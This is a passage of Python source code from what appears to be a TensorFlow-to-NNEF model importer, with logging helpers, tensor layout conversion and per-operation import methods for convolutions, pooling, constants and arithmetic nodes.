def print_msg_nodeop_nodename(self, title, op, name, level="info"):
preferred_width = 250
wrapper = textwrap.TextWrapper(initial_indent=title,
width=preferred_width,
subsequent_indent=' ' * len(title))
if level == "debug":
log_fct = self.logger.debug
elif level == "warning":
log_fct = self.logger.warning
elif level == "error":
log_fct = self.logger.error
elif level == "critical":
log_fct = self.logger.critical
else:
log_fct = self.logger.info
log_fct(self.single_line_sep)
log_fct(wrapper.fill("Name \t%s"%(name)))
wrapper = textwrap.TextWrapper(initial_indent=' ' * len(title),
width=preferred_width,
subsequent_indent=' ' * len(title))
log_fct(wrapper.fill("Op \t%s"%(op)))
def log_removing_node(self, nnef_node):
title = "Removing Node From Pool: "
preferredWidth = 250
wrapper = textwrap.TextWrapper(initial_indent=title,
width=preferredWidth,
subsequent_indent=' ' * len(title))
self.logger.info(self.single_line_sep)
self.logger.info(wrapper.fill("Name \t%s"%(nnef_node.name)))
wrapper = textwrap.TextWrapper(initial_indent=' ' * len(title),
width=preferredWidth,
subsequent_indent=' ' * len(title))
self.logger.info(wrapper.fill("Op \t%s"%(nnef_node.op)))
def log_skipping_nodes(self, tfnode):
self.print_msg_nodeop_nodename("Skipping Op: ", tfnode.op, tfnode.name)
title = "Skipping Tensorflow Node: "
preferredWidth = 250
wrapper = textwrap.TextWrapper(initial_indent=title,
width=preferredWidth,
subsequent_indent=' ' * len(title))
self.logger.info(self.single_line_sep)
self.logger.info(wrapper.fill("Name \t%s"%(tfnode.name)))
wrapper = textwrap.TextWrapper(initial_indent=' ' * len(title),
width=preferredWidth,
subsequent_indent=' ' * len(title))
self.logger.info(wrapper.fill("Op \t%s"%(tfnode.op)))
def log_unsupported_nodes(self, tfnode):
title = "Unsupported Tensorflow Node: "
preferredWidth = 250
wrapper = textwrap.TextWrapper(initial_indent=title,
width=preferredWidth,
subsequent_indent=' ' * len(title))
self.logger.info(self.single_line_sep)
self.logger.info(wrapper.fill("Name \t%s"%(tfnode.name)))
wrapper = textwrap.TextWrapper(initial_indent=' ' * len(title),
width=preferredWidth,
subsequent_indent=' ' * len(title))
self.logger.info(wrapper.fill("Op \t%s"%(tfnode.op)))
def log_total_conversions(self):
title = "Finished Converting Model: "
preferredWidth = 250
wrapper = textwrap.TextWrapper(initial_indent=title,
width=preferredWidth,
subsequent_indent=' ' * len(title))
self.logger.info(self.double_line_sep)
self.logger.info(wrapper.fill("Total Tensorflow Nodes \t%s"%(str(self.total))))
wrapper = textwrap.TextWrapper(initial_indent=' ' * len(title),
width=preferredWidth,
subsequent_indent=' ' * len(title))
self.logger.info(wrapper.fill("Successfully Converted \t%s"%(str(self.successful))))
self.logger.info(wrapper.fill("Nodes in Graph \t%s"%(str(len(self.node_pool.keys())-self.removed_nodes))))
def convert_format(convert_list, in_format='nhwc', out_format='nchw'):
in_format = in_format.lower()
out_format = out_format.lower()
in_n_loc = in_format.find('n')
out_n_loc = out_format.find('n')
in_c_loc = in_format.find('c')
out_c_loc = out_format.find('c')
n = convert_list[in_n_loc]
c = convert_list[in_c_loc]
sizes = []
for i in range(len(convert_list)):
if(i != in_n_loc and i != in_c_loc):
sizes.append(convert_list[i])
out_list = [None]*len(convert_list)
out_list[out_n_loc] = n
out_list[out_c_loc] = c
j = 0
for i in range(len(out_list)):
if(i != out_n_loc and i != out_c_loc):
out_list[i] = sizes[j]
j += 1
return out_list
class TensorflowImporter(TensorflowLogger, ImporterExporter):
def __init__(self, input_model, input_nodes, output_nodes, log_level='info'):
super(TensorflowImporter, self).__init__()
self.node_pool = collections.OrderedDict()
self.input_model = input_model
self.log_level = log_level
self.input_nodes = {}
self.output_nodes = {}
self.name_convs = {}
self.start_format = None
self.start_length = 0
self.successful = 0
self.total = 0
self.removed_nodes = 0
self.graph = super(TensorflowImporter, self).openProtobuf(self.input_model, graph_pb2.GraphDef())
i = 1
if input_nodes is not None:
for in_node_str in input_nodes.split(','):
if len(input_nodes.split(',')) == 1:
self.input_nodes[in_node_str] = "input"
else:
self.input_nodes[in_node_str] = "input" + str(i)
i += 1
else:
input_nodes = []
for tfnode in self.graph.node:
if hasattr(tfnode, 'op'):
if tfnode.op == 'Placeholder':
input_nodes.append(tfnode.name)
if len(input_nodes) == 1:
self.input_nodes[input_nodes[0]] = "input"
else:
for i in range(len(input_nodes)):
self.input_nodes[input_nodes[i]] = "input" + str(i+1)
i = 1
if output_nodes is not None:
for out_node_str in output_nodes.split(','):
if len(output_nodes.split(',')) == 1:
self.output_nodes[out_node_str] = "output"
else:
self.output_nodes[out_node_str] = "output" + str(i)
i += 1
else:
#Unable to use single loop for case of out of order nodes (MobileNetV2 from Model Zoo)
output_nodes = []
for tfnode in self.graph.node:
if hasattr(tfnode, 'op'):
output_nodes.append(tfnode.name)
for tfnode in self.graph.node:
if hasattr(tfnode, 'op'):
for input_val in tfnode.input:
if input_val in output_nodes:
output_nodes.remove(input_val)
if len(output_nodes) == 1:
self.output_nodes[output_nodes[0]] = "output"
else:
for i in range(len(output_nodes)):
self.output_nodes[output_nodes[i]] = "output" + str(i+1)
def run(self):
self.nxgraph = nx.OrderedDiGraph()
self.create_nodes()
self.log_total_conversions()
input_nodes = self.get_input_nodes()
output_nodes = self.get_output_nodes()
return NNEFGraph(os.path.basename(self.input_model).split('.')[0],
input_nodes,
output_nodes,
pre_compile_callback=self.pre_compile_callback,
post_compile_callback=self.post_compile_callback,
node_pool=self.node_pool)
def get_input_nodes(self):
input_node_list = []
if 'input' in self.node_pool.keys():
input_node_list.append(self.get_node_from_pool_by_name('input', get_orig=True))
else:
i = 1
while 'input' + str(i) in self.node_pool.keys():
input_node_list.append(self.get_node_from_pool_by_name('input'+str(i), get_orig=True))
i += 1
return input_node_list
def get_output_nodes(self):
output_node_list = []
if 'output' in self.node_pool.keys():
output_node_list.append(self.get_node_from_pool_by_name('output', get_orig=True))
else:
i = 1
while 'output' + str(i) in self.node_pool.keys():
output_node_list.append(self.get_node_from_pool_by_name('output' + str(i), get_orig=True))
i += 1
return output_node_list
def create_nodes(self):
for tfnode in self.graph.node:
self.total += 1
if self.start_format == None and tfnode.attr['data_format'].s != b'':
self.start_format = tfnode.attr['data_format'].s.decode('ascii')
if hasattr(tfnode, 'op'):
node_op = tfnode.op
if hasattr(self, "import_" + node_op):
func = getattr(self, "import_" + node_op)
nnef_node, tf_inputs, tf_attrs = func(tfnode)
self.successful += 1
if nnef_node is not None:
self.add_node_to_pool(nnef_node, tfnode, tf_inputs, tf_attrs)
else:
self.import_UNKNOWN(tfnode)
else:
self.logger.error("Node doesn't have op attr.: %s"%(tfnode.name))
def add_node_to_pool(self, nnef_node, tfnode, tf_inputs, tf_attrs):
if nnef_node.name not in self.node_pool.keys():
self.log_tf_node_info(tfnode, tf_inputs, tf_attrs)
self.node_pool[nnef_node.name] = nnef_node
def remove_node_from_pool(self, nnef_node):
self.log_removing_node(nnef_node)
self.node_pool.pop(nnef_node.name, None)
def get_node_from_pool(self, tfnode, idx):
node_name = self.gen_node_name(self.get_tfnode_input(tfnode, idx))
#Handles cases where nodes are out of order within Protocol Buffer
try:
nnef_node = self.get_node_from_pool_by_name(node_name)
except:
for tfnode in self.graph.node:
if self.gen_node_name(tfnode.name) == node_name:
if hasattr(tfnode, 'op'):
node_op = tfnode.op
if hasattr(self, "import_" + node_op):
func = getattr(self, "import_" + node_op)
nnef_node, tf_inputs, tf_attrs = func(tfnode)
if nnef_node is not None:
self.add_node_to_pool(nnef_node, tfnode, tf_inputs, tf_attrs)
break
nnef_node = self.get_node_from_pool_by_name(node_name)
if nnef_node.op == 'idn':
nnef_node = self.get_node_from_pool_by_name(nnef_node.name).parameters['x']
return nnef_node
def get_node_from_pool_by_name(self, node_name, get_orig=False):
if node_name in self.name_convs and not get_orig:
node_name = self.name_convs[node_name]
assert node_name in self.node_pool.keys(), "Node pool doesn't contain required node: %s" % node_name
return self.node_pool[node_name]
def shape_nx_graph(self, nx_graph):
remove_nodes = []
if self.start_format is None:
for nnef_node_name in nx_graph:
if nx_graph.node[nnef_node_name]['node'].op == 'pad':
remove_nodes.append(nnef_node_name)
for nnef_node_name in remove_nodes:
nx_graph.remove_node(nnef_node_name)
return
else:
nnef_format = 'NC...'
if len(self.start_format) != self.start_length:
if(self.start_format == 'NHWC' and self.start_length == 3):
self.start_format = 'NHC'
elif(self.start_format == 'NCHW' and self.start_length == 3):
self.start_format = 'NCH'
else:
raise ValueError("Issue with compatibility of start_format : " + self.start_format +
" and start_length : " + str(self.start_length))
current_format = self.start_format
indexes = list(range(len(self.start_format)))
mapping = {}
for i in range(len(self.start_format)):
if self.start_format[i] in nnef_format:
index = nnef_format.find(self.start_format[i])
indexes.pop(indexes.index(index))
mapping[i] = index
for i in range(len(self.start_format)):
if i not in mapping:
mapping[i] = indexes[0]
indexes.pop(0)
for nnef_node_name in nx_graph:
if nx_graph.node[nnef_node_name]['node'].op == 'pad':
remove_nodes.append(nnef_node_name)
continue
nnef_node = nx_graph.node[nnef_node_name]['node']
if nnef_node.op not in ['variable', 'constant', 'reshape']:
if '_data_format' in nnef_node.parameters and nnef_node.parameters['_data_format'] != '':
self.current_format = nnef_node.parameters['_data_format']
if 'shape' in nnef_node.parameters and current_format is not None:
nnef_node.parameters['shape'] = convert_format(nnef_node.parameters['shape'], current_format, nnef_format)
if nnef_node.op == 'transpose' and current_format is not None:
new_format = ''
for i in nnef_node.parameters['axes']:
new_format += current_format[i]
new_perms = list(range(len(nnef_node.parameters['axes'])))
nnef_node.parameters['axes'] = convert_format(new_perms, nnef_format, new_format)
current_format = new_format
if 'axes' in nnef_node.parameters and current_format is not None and nnef_node.op not in ['softmax', 'transpose']:
new_axes = []
for i in nnef_node.parameters['axes']:
new_axes.append(mapping[i])
nnef_node.parameters['axes'] = new_axes
if 'axis' in nnef_node.parameters and current_format is not None:
new_axis = mapping[nnef_node.parameters['axis']]
nnef_node.parameters['axis'] = new_axis
if nnef_node.output_shape is not None and \
len(nnef_node.output_shape) == len(self.start_format) and \
current_format is not None:
nnef_node.output_shape = convert_format(nnef_node.output_shape, current_format, nnef_format)
elif nnef_node.op == 'reshape':
if not nnef_node.parameters['_maintain_format']:
current_format = None
nx_graph.remove_nodes_from(remove_nodes)
# Helper function to convert node names to lower case and remove illegal characters ('/', ...)
def gen_node_name(self, node_name):
try:
if isinstance(node_name, unicode):
node_name = node_name.encode('ascii')
except NameError:
node_name = node_name
assert isinstance(node_name, str), "self.gen_node_name: node_name is not a str"
if node_name in self.input_nodes:
node_name = self.input_nodes[node_name]
return node_name
if node_name in self.output_nodes:
node_name = self.output_nodes[node_name]
return node_name
name = node_name.lower()
if name[-5:] == '/read':
name = name[:-5]
name = name.replace('/', '_')
name = name.replace(':', '_')
return name
def get_tfnode_input(self, tfnode, idx):
assert idx < len(tfnode.input), "Bad index for accessing Tensorflow's op input %s"%idx
return tfnode.input[idx]
'''
Called by the NNEF graph when all nodes are there, with no edge yet.
'''
def pre_compile_callback(self, nx_graph):
# Cleaning up "idn" nodes
remove_nodes = []
for nnef_node_name in nx_graph:
if nx_graph.node[nnef_node_name]['node'].op is 'idn':
remove_nodes.append(nx_graph.node[nnef_node_name]['node'].name)
nx_graph.remove_nodes_from(remove_nodes)
return
'''
Called by the NNEF graph after edges are connected.
'''
def post_compile_callback(self, nx_graph):
self.shape_nx_graph(nx_graph)
@staticmethod
def nnef_padding(padding, rank):
return [] if padding.upper() == b'SAME' else [(0, 0)] * rank
@staticmethod
def tensor_shape_to_list(shapes):
return [dim.size for dim in shapes.dim]
def new_get_attr(self, tfnode, attribute, *args):
if attribute == 'ksize' and tfnode.attr['ksize'].list.i is not None:
ksize = tfnode.attr[attribute].list.i
ksize = [int(v) for v in ksize]
ksize = convert_format(ksize, args[1], 'NC...')
return ksize
elif attribute == 'padding' and tfnode.attr[attribute].s is not None:
value = tfnode.attr[attribute].s
rank = args[0] if args[0] is not None else 4
padding = self.nnef_padding(value, rank)
return padding
elif attribute == 'strides' and tfnode.attr['strides'].list.i is not None:
strides = tfnode.attr[attribute].list.i
strides = [int(v) for v in strides]
strides = convert_format(strides, args[1], 'NC...')
return strides
elif attribute == 'dilations' and tfnode.attr['dilations'].list.i is not None:
dilations = tfnode.attr['dilations'].list.i
dilations = [int(v) for v in dilations]
if dilations:
dilations = convert_format(dilations, args[1], 'NC...')
return dilations
elif attribute == 'alpha' and tfnode.attr['alpha'].f is not None:
value = tfnode.attr['alpha'].f
return value
elif attribute == 'beta' and tfnode.attr['beta'].f is not None:
value = tfnode.attr['beta'].f
return value
elif attribute == 'bias' and tfnode.attr['bias'].f is not None:
value = tfnode.attr['bias'].f
return value
elif attribute == 'transpose_a':
value = self._get_attr(tfnode, attribute)
return value
elif attribute == 'transpose_b':
value = self._get_attr(tfnode, attribute)
return value
elif attribute == 'epsilon':
value = tfnode.attr['epsilon'].f
return value
else:
self._get_attr(tfnode, attribute)
def _get_attr(self, tfnode, name, default_value=None):
if name in tfnode.attr:
attr = tfnode.attr[name]
field = attr.WhichOneof('value')
val = getattr(attr, field) if field else default_value
if isinstance(val, attr_value_pb2.AttrValue.ListValue):
return list(val.ListFields()[0][1])
else:
return val.decode('utf-8') if isinstance(val, bytes) else val
else:
return default_value
def get_numpy_from_tf_tensor(self, tf_tensor):
if tf_tensor.dtype == 3:
nnef_dtype = np.int32
elif tf_tensor.dtype == 1:
nnef_dtype = np.float32
tf_shape = self.tensor_shape_to_list(tf_tensor.tensor_shape)
if not tf_shape:
assert False, "tf_shape is None!"
tf_shape = [1]
if (len(tf_shape) == 1 and tf_shape[0] != 1):
tf_shape = [1, tf_shape[0]]
return tf_tensor.tensor_content, nnef_dtype, tf_shape
def define_elementwise_binary_output_shape(self, nnef_node_x, nnef_node_y):
y_size = x_size = 1
for i in nnef_node_x.output_shape:
x_size *= i
for i in nnef_node_y.output_shape:
y_size *= i
if x_size >= y_size:
output_shape = nnef_node_x.output_shape[:]
else:
output_shape = nnef_node_y.output_shape[:]
return output_shape
@staticmethod
def _get_scopes(layer_name):
return layer_name.split('/')
def import_UNKNOWN(self, tfnode):
self.log_unsupported_nodes(tfnode)
return
def import_NoOp(self, tfnode):
return None, None, None, None
def import_Const(self, tfnode):
if tfnode.attr['value'].tensor.tensor_content == b'':
shape = self.tensor_shape_to_list(tfnode.attr['value'].tensor.tensor_shape)
if len(shape) == 1:
if shape[0] == 0:
nnef_node = node.Constant(value=[],
shape=shape,
_uid=self.gen_node_name(tfnode.name),
_np_dtype=None,
_output_shape=shape)
return nnef_node, {}, {}
else:
shape = [1] + shape
value = None
if tfnode.attr['value'].tensor.dtype == 3:
value = [float(tfnode.attr['value'].tensor.int_val[0])]
np_dtype = np.int32
elif tfnode.attr['value'].tensor.dtype == 1:
value = [float(tfnode.attr['value'].tensor.float_val[0])]
np_dtype = np.float32
elif tfnode.attr['value'].tensor.dtype == 10:
raise ValueError("Type logical is not currently supported within NNEF as a constant or variable")
else:
raise ValueError("Type " + str(tfnode.attr['value'].tensor.dtype) + " is not currently supported")
if shape == []:
shape = [1, 1]
nnef_node = node.Constant(value=value,
shape=shape,
_uid=self.gen_node_name(tfnode.name),
_np_dtype=np_dtype,
_output_shape=shape)
inputs = {}
attrs = {'value': value, 'shape':shape}
else:
np_tensor, np_dtype, shape = self.get_numpy_from_tf_tensor(tfnode.attr['value'].tensor)
try:
if isinstance(tfnode.name, unicode):
label = tfnode.name.encode('ascii')
else:
label = tfnode.name
except NameError:
label = tfnode.name
nnef_node = node.Variable(label=label,
shape=shape,
_np_dtype=np_dtype,
_np_tensor=np_tensor,
_output_shape=shape,
_uid=self.gen_node_name(tfnode.name))
inputs = {}
attrs = {'label': tfnode.name, 'shape':shape}
return nnef_node, inputs, attrs
def import_Abs(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Abs(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Add(self, tfnode):
tf_inputs = {'x':0, 'y':1}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
nnef_node_y = self.get_node_from_pool(tfnode, tf_inputs['y'])
output_shape = self.define_elementwise_binary_output_shape(nnef_node_x, nnef_node_y)
nnef_node = node.Add(x=nnef_node_x,
y=nnef_node_y,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_AvgPool(self, tfnode):
tf_inputs = {'input':0}
data_format = tfnode.attr['data_format'].s.decode('ascii')
padding = self.new_get_attr(tfnode, 'padding', 4, data_format)
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
if nnef_node_input.op == 'pad':
pad_array = nnef_node_input.parameters['padding']
nnef_node_input = nnef_node_input.parameters['input']
padding = []
if data_format == 'NHWC':
padding.append((pad_array[0][0], pad_array[0][1]))
padding.append((pad_array[-1][0], pad_array[-1][1]))
for i in range(1, len(pad_array)-1):
padding.append((pad_array[i][0], pad_array[i][1]))
else:
padding
for i in range(len(pad_array)):
padding.append((pad_array[i][0], pad_array[i][1]))
sizes = self.new_get_attr(tfnode, 'ksize', None, data_format)
strides = self.new_get_attr(tfnode, 'strides', None, data_format)
dilations = [1, 1, 1, 1]
#Modify tensor data for filter
in_shape = nnef_node_input.output_shape[:]
in_shape = convert_format(in_shape, data_format, 'NCHW')
if nnef_node_input.op == 'reshape':
nnef_node_input.parameters['shape'] = in_shape
#Calculate output shape
output_shape = len(in_shape) * [0]
for i in range(len(in_shape)):
if padding == []:
output_shape[i] = math.ceil(in_shape[i] / strides[i])
else:
fd = (sizes[i] - 1) * dilations[i] + 1
padding_add = padding[i][0] + padding[i][1]
output_shape[i] = math.floor((in_shape[i] + padding_add - fd) / strides[i]) + 1
output_shape = convert_format(output_shape, 'NCHW', data_format)
output_shape = [int(v) for v in output_shape]
nnef_node = node.AvgPool(input=nnef_node_input,
size=sizes,
padding=padding,
stride=strides,
dilation=dilations,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_data_format=data_format)
attrs = {'padding':padding, 'ksize':sizes, 'strides':strides}
return nnef_node, tf_inputs, attrs
def import_BiasAdd(self, tfnode):
tf_inputs = {'x':0, 'y':1}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
nnef_node_y = self.get_node_from_pool(tfnode, tf_inputs['y'])
output_shape = self.define_elementwise_binary_output_shape(nnef_node_x, nnef_node_y)
nnef_node = node.Add(x=nnef_node_x,
y=nnef_node_y,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Ceil(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Ceil(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_ConcatV2(self, tfnode):
tf_inputs = {}
attrs = {}
nnef_nodes = []
for i in range(len(tfnode.input)-1):
nnef_nodes.append(self.get_node_from_pool(tfnode, i))
tf_inputs['value_' + str(i)] = i
nnef_node_axis = self.get_node_from_pool(tfnode, len(tfnode.input)-1)
tf_inputs['value_' + str(len(tfnode.input)-1)] = len(tfnode.input)-1
axis = int(nnef_node_axis.parameters['value'][0])
self.remove_node_from_pool(nnef_node_axis)
output_shape = nnef_nodes[0].output_shape[:]
for nnef_node in nnef_nodes[1:]:
output_shape[axis] += nnef_node.output_shape[axis]
nnef_node = node.Concat(values=nnef_nodes,
axis=axis,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Conv2D(self, tfnode):
tf_inputs = {'input': 0, 'filter':1}
data_format = tfnode.attr['data_format'].s.decode('ascii')
padding = self.new_get_attr(tfnode, 'padding', 2, data_format)
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
nnef_node_filter = self.get_node_from_pool(tfnode, tf_inputs['filter'])
if nnef_node_input.op == 'pad':
pad_array = nnef_node_input.parameters['padding']
nnef_node_input = nnef_node_input.parameters['input']
padding = []
if data_format == 'NHWC':
for i in range(1, len(pad_array)-1):
padding.append((pad_array[i][0], pad_array[i][1]))
else:
for i in range(2, len(pad_array)):
padding.append((pad_array[i][0], pad_array[i][1]))
strides = self.new_get_attr(tfnode, 'strides', None, data_format)
strides = strides[2:]
dilations = self.new_get_attr(tfnode, 'dilations', None, data_format)
dilations = dilations[2:]
#Modify tensor data for filter
in_shape = nnef_node_input.output_shape[:]
in_shape = convert_format(in_shape, data_format, 'NCHW')
if nnef_node_input.op == 'reshape':
nnef_node_input.parameters['shape'] = in_shape
if nnef_node_filter.op == 'variable':
filter_tdf = nnef_node_filter.get_tensordatafile()
nnef_tensor = np.transpose(filter_tdf.get_data().get_array()[0], [3, 2, 0, 1])
filter_tdf.get_data().set_array(nnef_tensor)
new_shape = list(np.shape(filter_tdf.get_data().get_array()[0]))
filter_tdf.header.set_tensor_dimensions(new_shape)
nnef_node_filter.parameters['shape'] = new_shape
nnef_node_filter.output_shape = new_shape
elif nnef_node_filter.op == 'reshape':
current_shape = nnef_node_filter.parameters['shape'][:]
new_shape = convert_format(current_shape, 'HWNC', 'CNHW')
nnef_node_filter.parameters['shape'] = new_shape
nnef_node_filter.output_shape = new_shape
else:
new_shape = [1]*len(in_shape)
#Calculate output shape
output_shape = len(in_shape) * [0]
output_shape[0] = in_shape[0]
output_shape[1] = new_shape[0]
for i in range(2, len(in_shape)):
if padding == []:
output_shape[i] = math.ceil(in_shape[i] / strides[i-2])
else:
fd = (new_shape[i] - 1) * dilations[i-2] + 1
padding_add = padding[i-2][0] + padding[i-2][1]
output_shape[i] = math.floor((in_shape[i] + padding_add - fd) / strides[i-2]) + 1
output_shape = convert_format(output_shape, 'NCHW', data_format)
output_shape = [int(v) for v in output_shape]
nnef_node = node.Conv(input=nnef_node_input,
filter=nnef_node_filter,
padding=padding,
stride=strides,
dilation=dilations,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_data_format=data_format)
attrs = {'padding': padding, 'strides': strides, 'dilations': dilations}
return nnef_node, tf_inputs, attrs
def import_Conv3D(self, tfnode):
tf_inputs = {'input': 0, 'filter':1}
data_format = tfnode.attr['data_format'].s.decode('ascii')
padding = self.new_get_attr(tfnode, 'padding', 3, data_format)
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
nnef_node_filter = self.get_node_from_pool(tfnode, tf_inputs['filter'])
if nnef_node_input.op == 'pad':
pad_array = nnef_node_input.parameters['padding']
nnef_node_input = nnef_node_input.parameters['input']
padding = []
if data_format == 'NDHWC':
for i in range(1, len(pad_array)-1):
padding.append((pad_array[i][0], pad_array[i][1]))
else:
for i in range(2, len(pad_array)):
padding.append((pad_array[i][0], pad_array[i][1]))
strides = self.new_get_attr(tfnode, 'strides', None, data_format)
strides = strides[2:]
dilations = self.new_get_attr(tfnode, 'dilations', None, data_format)
dilations = dilations[2:]
#Modify tensor data for filter
in_shape = nnef_node_input.output_shape[:]
in_shape = convert_format(in_shape, data_format, 'NCDHW')
if nnef_node_input.op == 'reshape':
nnef_node_input.parameters['shape'] = in_shape
if nnef_node_filter.op == 'variable':
filter_tdf = nnef_node_filter.get_tensordatafile()
nnef_tensor = np.transpose(filter_tdf.get_data().get_array()[0], [4, 3, 0, 1, 2])
filter_tdf.get_data().set_array(nnef_tensor)
new_shape = list(np.shape(filter_tdf.get_data().get_array()[0]))
filter_tdf.header.set_tensor_dimensions(new_shape)
nnef_node_filter.parameters['shape'] = new_shape
elif nnef_node_filter.op == 'reshape':
current_shape = nnef_node_filter.parameters['shape'][:]
new_shape = convert_format(current_shape, 'DHWNC', 'CNDHW')
nnef_node_filter.parameters['shape'] = new_shape
else:
new_shape = [1]*len(in_shape)
#Calculate output shape
output_shape = len(in_shape) * [0]
output_shape[0] = in_shape[0]
output_shape[1] = new_shape[0]
for i in range(2, len(in_shape)):
if padding == []:
output_shape[i] = math.ceil(in_shape[i] / strides[i-2])
else:
fd = (new_shape[i] - 1) * dilations[i-2] + 1
padding_add = padding[i-2][0] + padding[i-2][1]
output_shape[i] = math.floor((in_shape[i] + padding_add - fd) / strides[i-2]) + 1
output_shape = convert_format(output_shape, 'NCDHW', data_format)
output_shape = [int(v) for v in output_shape]
nnef_node = node.Conv(input=nnef_node_input,
filter=nnef_node_filter,
padding=padding,
stride=strides,
dilation=dilations,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_data_format=data_format)
attrs = {'padding': padding, 'strides': strides, 'dilations': dilations}
return nnef_node, tf_inputs, attrs
def import_Conv2DBackpropInput(self, tfnode):
tf_inputs = {'input': 2, 'filter':1}
output_node = self.get_node_from_pool(tfnode, 0)
self.remove_node_from_pool(output_node)
data_format = tfnode.attr['data_format'].s.decode('ascii')
padding = self.new_get_attr(tfnode, 'padding', 2, data_format)
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
nnef_node_filter = self.get_node_from_pool(tfnode, tf_inputs['filter'])
if nnef_node_input.op == 'pad':
pad_array = nnef_node_input.parameters['padding']
nnef_node_input = nnef_node_input.parameters['input']
padding = []
if data_format == 'NHWC':
for i in range(1, len(pad_array)-1):
padding.append((pad_array[i][0], pad_array[i][1]))
else:
for i in range(2, len(pad_array)):
padding.append((pad_array[i][0], pad_array[i][1]))
strides = self.new_get_attr(tfnode, 'strides', None, data_format)
strides = strides[2:]
dilations = self.new_get_attr(tfnode, 'dilations', None, data_format)
dilations = dilations[2:]
#Modify tensor data for filter
in_shape = nnef_node_input.output_shape[:]
in_shape = convert_format(in_shape, data_format, 'NCHW')
if nnef_node_input.op == 'reshape':
nnef_node_input.parameters['shape'] = in_shape
if nnef_node_filter.op == 'variable':
filter_tdf = nnef_node_filter.get_tensordatafile()
nnef_tensor = np.transpose(filter_tdf.get_data().get_array()[0], [3, 2, 0, 1])
filter_tdf.get_data().set_array(nnef_tensor)
new_shape = list(np.shape(filter_tdf.get_data().get_array()[0]))
filter_tdf.header.set_tensor_dimensions(new_shape)
nnef_node_filter.parameters['shape'] = new_shape
elif nnef_node_filter.op == 'reshape':
current_shape = nnef_node_filter.parameters['shape'][:]
new_shape = convert_format(current_shape, 'HWNC', 'CNHW')
nnef_node_filter.parameters['shape'] = new_shape
else:
new_shape = [1]*len(in_shape)
#Calculate output shape
output_shape = len(in_shape) * [0]
output_shape[0] = in_shape[0]
output_shape[1] = new_shape[1]
for i in range(2, len(in_shape)):
fd = (new_shape[i] - 1) * dilations[i-2] + 1
if padding == []:
padding_add = new_shape[i] - 2
else:
padding_add = padding[i-2][0] + padding[i-2][1]
output_shape[i] = (in_shape[i] - 1)*strides[i-2] + fd - padding_add
output_shape = convert_format(output_shape, 'NCHW', data_format)
output_shape = [int(v) for v in output_shape]
nnef_node = node.Deconv(input=nnef_node_input,
filter=nnef_node_filter,
padding=padding,
stride=strides,
dilation=dilations,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_data_format=data_format)
attrs = {'padding': padding, 'strides': strides, 'dilations': dilations}
return nnef_node, tf_inputs, attrs
def import_Conv3DBackpropInputV2(self, tfnode):
tf_inputs = {'input': 2, 'filter':1}
output_node = self.get_node_from_pool(tfnode, 0)
self.remove_node_from_pool(output_node)
data_format = tfnode.attr['data_format'].s.decode('ascii')
padding = self.new_get_attr(tfnode, 'padding', 3, data_format)
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
nnef_node_filter = self.get_node_from_pool(tfnode, tf_inputs['filter'])
if nnef_node_input.op == 'pad':
pad_array = nnef_node_input.parameters['padding']
nnef_node_input = nnef_node_input.parameters['input']
padding = []
if data_format == 'NHWC':
for i in range(1, len(pad_array)-1):
padding.append((pad_array[i][0], pad_array[i][1]))
else:
for i in range(2, len(pad_array)):
padding.append((pad_array[i][0], pad_array[i][1]))
strides = self.new_get_attr(tfnode, 'strides', None, data_format)
strides = strides[2:]
dilations = self.new_get_attr(tfnode, 'dilations', None, data_format)
dilations = dilations[2:]
#Modify tensor data for filter
in_shape = nnef_node_input.output_shape[:]
in_shape = convert_format(in_shape, data_format, 'NCDHW')
if nnef_node_input.op == 'reshape':
nnef_node_input.parameters['shape'] = in_shape
if nnef_node_filter.op == 'variable':
filter_tdf = nnef_node_filter.get_tensordatafile()
nnef_tensor = np.transpose(filter_tdf.get_data().get_array()[0], [4, 3, 0, 1, 2])
filter_tdf.get_data().set_array(nnef_tensor)
new_shape = list(np.shape(filter_tdf.get_data().get_array()[0]))
filter_tdf.header.set_tensor_dimensions(new_shape)
nnef_node_filter.parameters['shape'] = new_shape
elif nnef_node_filter.op == 'reshape':
current_shape = nnef_node_filter.parameters['shape'][:]
new_shape = convert_format(current_shape, 'DHWNC', 'CNDHW')
nnef_node_filter.parameters['shape'] = new_shape
else:
new_shape = [1]*len(in_shape)
#Calculate output shape
output_shape = len(in_shape) * [0]
output_shape[0] = in_shape[0]
output_shape[1] = new_shape[1]
for i in range(2, len(in_shape)):
fd = (new_shape[i] - 1) * dilations[i-2] + 1
if padding == []:
padding_add = new_shape[i] - 2
else:
padding_add = padding[i-2][0] + padding[i-2][1]
output_shape[i] = (in_shape[i] - 1)*strides[i-2] + fd - padding_add
output_shape = convert_format(output_shape, 'NCDHW', data_format)
output_shape = [int(v) for v in output_shape]
nnef_node = node.Deconv(input=nnef_node_input,
filter=nnef_node_filter,
padding=padding,
stride=strides,
dilation=dilations,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_data_format=data_format)
